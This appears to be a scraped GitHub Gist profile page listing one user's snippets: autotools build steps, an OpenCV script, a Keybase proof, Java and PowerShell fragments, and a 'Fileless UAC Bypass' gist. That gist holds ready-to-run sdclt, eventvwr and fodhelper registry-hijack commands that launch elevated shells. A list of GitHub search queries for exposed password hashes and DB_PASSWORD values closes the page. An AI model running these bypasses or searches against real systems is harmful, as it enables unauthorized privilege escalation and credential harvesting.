Skip to content

Instantly share code, notes, and snippets.

View initpwn's full-sized avatar
👽
"Life is short, and it's up to you to make it sweet." - Sarah Louise Delany

Joseph Philip initpwn

👽
"Life is short, and it's up to you to make it sweet." - Sarah Louise Delany
View GitHub Profile

On the maintainer’s system:

aclocal # for init m4 env
autoconf # To gen configure from configure.ac
automake --add-missing # To gen Makefile.in from Makefile.am
./configure # To gen Makefile from Makefile.in
make distcheck # Makefile to build (Will also release tarball to distribute)
{"draftvalue": "2020-08-03 01:14:20.839651"}

Using OpenCV

import cv2
import sys 

image = cv2.imread("pic.png")
#imshow() is the function that displays the image on the screen.
cv2.imshow("OpenCV Image Reading", image) #first arg is the title, second is the image that is already read
cv2.waitKey(0) #like getch() in Turbo C, wait for a key to get pressed by the user

Keybase proof

I hereby claim:

  • I am initpwn on github.
  • I am initpwn (https://keybase.io/initpwn) on keybase.
  • I have a public key ASB5Ve6mPcjASZCuLt5GO-6JbRPES99nUvfgpeK1-xUxBAo

To claim this, I am signing this object:

@initpwn
initpwn / .bat
Created August 7, 2017 16:12
Fileless UAC Bypass
#sdclt fileless UAC bypass
regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\
@initpwn
initpwn / addNewAPK.java
Created March 20, 2017 14:33
Delta++,BCA Proj.
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package delta;
import ie.wombat.jbdiff.JBDiff;
import java.awt.TrayIcon;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
Function Check-Spelling()
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True,Position=0,ValueFromPipeline=$True)]
[String] $String,
[Switch] $ShowErrors,
[Switch] $RemoveSpecialChars
)
Process{
#md5 hash of most used password 123456
#ref: https://twitter.com/TekDefense/status/294556153151647744
https://github.com/search?q=e10adc3949ba59abbe56e057f20f883e&type=Code&ref=searchresults
#DB_PASSWORD
#ref: http://seclists.org/fulldisclosure/2014/Mar/343
https://github.com/search?q=define%28%22DB_PASSWORD%22&type=Code&ref=searchresults
#Possible SQL injection
#ref: http://seclists.org/fulldisclosure/2013/Jun/15